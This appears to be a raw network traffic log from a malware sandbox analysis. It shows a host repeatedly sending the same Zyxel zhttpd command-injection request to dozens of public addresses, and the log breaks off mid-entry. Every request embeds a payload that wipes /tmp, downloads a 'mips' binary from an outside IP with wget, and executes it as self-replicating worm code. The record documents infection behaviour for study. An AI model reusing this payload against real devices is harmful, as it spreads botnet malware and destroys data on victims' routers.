                              Session IDSource IPSource PortDestination IPDestination Port
                              973192.168.2.1344932135.143.212.159443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.515924931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              974192.168.2.134956283.112.202.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.515974045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              975192.168.2.135818494.90.139.189443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.516027927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              976192.168.2.135424238.37.17.17443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.516031981 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              977192.168.2.135701225.130.15.64443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.516087055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              978192.168.2.135740887.12.49.164443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.516120911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              979192.168.2.135412660.147.137.191443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.516139030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              980192.168.2.135174837.128.195.26443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:05.516211987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              981192.168.2.135568035.112.92.120443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:06.522062063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              982192.168.2.134134478.192.213.84443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:06.522118092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              983192.168.2.1346180211.32.130.223443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:06.522164106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              984192.168.2.135458853.237.223.202443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:06.522228956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              985192.168.2.1354796117.49.24.52443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:06.522250891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              986192.168.2.1346354114.102.171.165443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:06.522317886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              987192.168.2.1350064118.84.96.86443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:06.522361994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              988192.168.2.135333479.155.178.201443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:06.522411108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              989192.168.2.1349352115.107.231.219443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:06.522440910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              990192.168.2.1338690108.240.164.42443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:06.522507906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              991192.168.2.1358758142.244.107.84443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:06.522577047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              992192.168.2.1357298143.47.253.12443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:06.522620916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              993192.168.2.1345844206.13.23.245443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:06.522664070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              994192.168.2.133508039.22.4.116443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:06.522707939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              995192.168.2.133568491.17.208.171443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:06.522788048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              996192.168.2.1354538190.175.165.209443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:06.522830009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              997192.168.2.1352356164.59.96.60443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:06.522881031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              998192.168.2.1339592210.235.208.155443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:06.522933960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              999192.168.2.134829636.232.217.195443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:06.522983074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1000192.168.2.1354676206.255.125.27443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:06.523034096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1001192.168.2.134023263.171.14.35443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:06.523052931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1002192.168.2.1355302198.201.189.168443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:06.523104906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1003192.168.2.1335506102.71.47.6443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:06.523154974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1004192.168.2.134241047.200.42.74443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:06.523197889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1005192.168.2.133681472.248.6.20443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:06.523240089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1006192.168.2.1343694193.101.0.250443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:06.523304939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1007192.168.2.1360734148.60.4.28443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:06.523313999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1008192.168.2.1333552203.240.39.197443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:06.523348093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1009192.168.2.1357478178.249.200.103443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:06.523411989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1010192.168.2.135168881.210.113.208443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:06.523454905 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1011192.168.2.1356828181.93.194.21443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:06.523495913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1012192.168.2.1353466149.172.220.194443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:06.523561954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1013192.168.2.1347854101.16.33.147443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:06.523595095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1014192.168.2.133467067.75.37.164443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:06.523647070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1015192.168.2.133750082.247.53.133443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:06.523694038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1016192.168.2.134204442.106.122.47443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:06.523755074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1017192.168.2.134373877.52.83.230443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:06.523842096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1018192.168.2.1350488221.186.223.94443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.537646055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1019192.168.2.134717084.161.135.211443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.537662983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1020192.168.2.1356250216.93.234.180443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.537704945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1021192.168.2.135776836.187.10.83443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.537741899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1022192.168.2.1344898183.247.233.102443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.537775040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1023192.168.2.133565018.118.74.216443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.537820101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1024192.168.2.134091651.84.142.183443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.537861109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1025192.168.2.133690689.243.80.167443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.537893057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1026192.168.2.1357306130.151.65.51443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.537925005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1027192.168.2.1348040157.172.231.81443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.537962914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1028192.168.2.1341844106.198.203.195443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.537975073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1029192.168.2.1337602198.50.92.198443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.537991047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1030192.168.2.1347966102.71.72.43443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.538057089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1031192.168.2.1351734223.234.131.95443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.538084030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1032192.168.2.1355220141.35.81.234443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.538116932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1033192.168.2.1349706206.28.94.27443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.538183928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1034192.168.2.1340798111.130.238.152443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.538201094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1035192.168.2.135663286.108.183.227443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.538220882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1036192.168.2.1344098176.17.104.22443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.538269997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1037192.168.2.134679067.149.149.21443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.538294077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1038192.168.2.1355310115.149.98.140443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.538315058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1039192.168.2.134646617.140.38.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.538355112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1040192.168.2.1334702143.187.6.0443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.538394928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1041192.168.2.133750087.89.154.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:08.538430929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1042192.168.2.1352440220.124.48.153443
                              TimestampBytes transferredDirectionData
